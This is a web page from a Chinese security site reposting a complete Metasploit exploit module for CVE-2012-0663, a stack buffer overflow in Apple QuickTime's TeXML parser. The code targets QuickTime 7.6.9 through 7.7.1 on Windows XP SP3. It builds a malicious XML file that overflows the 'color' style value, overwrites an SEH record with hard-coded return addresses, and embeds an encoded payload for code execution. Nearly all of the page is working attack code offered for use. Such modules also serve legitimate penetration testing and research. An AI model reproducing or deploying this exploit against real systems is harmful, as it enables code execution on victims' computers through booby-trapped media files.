首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple QuickTime TeXML Stack Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-07-02  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Apple QuickTime TeXML Stack Buffer Overflow',
            'Description'    => %q{
                    This module exploits a vulnerability found in Apple QuickTime. When handling
                a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
                gain arbitrary code execution under the context of the user.  The flaw is
                generally known as a bug while processing the 'transform' attribute, however,
                that attack vector seems to only cause a TerminateProcess call due to a corrupt
                stack cookie, and more data will only trigger a warning about the malformed XML
                file.  This module exploits the 'color' value instead, which accomplishes the same
                thing.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Alexander Gavrun',  # Vulnerability Discovery
                    'sinn3r',            # Metasploit Module
                    'juan vazquez'       # Metasploit Module
                ],
            'References'     =>
                [
                    [ 'OSVDB', '81934' ],
                    [ 'CVE', '2012-0663' ],
                    [ 'BID', '53571' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],
                    [ 'URL', 'http://support.apple.com/kb/HT1222' ]
                ],
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'BadChars'    => "\x00\x23\x25\x3c\x3e\x7d"
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'QuickTime 7.7.1 on Windows XP SP3',
                        {
                            'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
                            'Offset' => 643,
                            'Max' => 13508
                        }
                    ],
                    [ 'QuickTime 7.7.0 on Windows XP SP3',
                        {
                            'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
                            'Offset' => 643,
                            'Max' => 13508
                        }
                    ],
                    [ 'QuickTime 7.6.9 on Windows XP SP3',
                        {
                            'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
                            'Offset' => 643,
                            'Max' => 13508
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'May 15 2012'))
 
        register_options(
            [
                OptString.new('FILENAME', [ true, 'The file name.',  'msf.xml']),
            ], self.class)
    end
 
    def exploit
        my_payload = rand_text(target['Offset'])
        my_payload << generate_seh_record(target.ret)
        my_payload << payload.encoded
        my_payload << rand_text(target['Max'] - my_payload.length)
 
        texml = <<-eos
        <?xml version="1.0"?>
        <?quicktime type="application/x-quicktime-texml"?>
 
        <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
            language="eng" timeScale="600"
            transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
            <sample duration="2400" keyframe="true">
 
                <description format="tx3g" displayFlags="ScrollIn"
                    horizontalJustification="Left"
                    verticalJustification="Top"
                    backgroundColor="0%, 0%, 0%, 100%">
 
                    <defaultTextBox x="0" y="0" width="176"  height="60"/>
                    <fontTable>
                        <font id="1" name="Times"/>
                    </fontTable>
 
                    <sharedStyles>
                    <style id="1">
                        {font-table: 1} {font-size:  10}
                        {font-style:normal}
                        {font-weight: normal}
                        {color: #{my_payload}%, 100%, 100%, 100%}
                    </style>
                    </sharedStyles>
                </description>
 
                <sampleData scrollDelay="200"
                    highlightColor="25%, 45%, 65%, 100%"
                    targetEncoding="utf8">
 
                    <textBox x="10" y="10" width="156"  height="40"/>
                        <text styleID="1">What you need... Metasploit!</text>
                        <highlight startMarker="1" endMarker="2"/>
                        <blink startMarker="3" endMarker="4"/>
                </sampleData>
            </sample>
        </text3GTrack>
        eos
 
        texml = texml.gsub(/^\t\t/,'')
 
        print_status("Creating '#{datastore['FILENAME']}'.")
        file_create(texml)
    end
 
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec PcAnywhere 12.5.0 Log
·Linux Kernel 2.6.18-374 Local
·Real Player 10 GOLD - Exceptio
·PC Tools Firewall Plus 7.0.0.1
·Linux 3.x.x Executable File Re
·Zoom Player 4.51 Standard - ".
·VLC 2.0.1 - .avi playlist plug
·python-wrapper untrusted searc
·Root Exploit Western Digital's
·Chrome Engine 4 Denial of Serv
·Western Digital TV (WD-TV) Liv
·xArrow <= 3.2 multiple vulnera
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved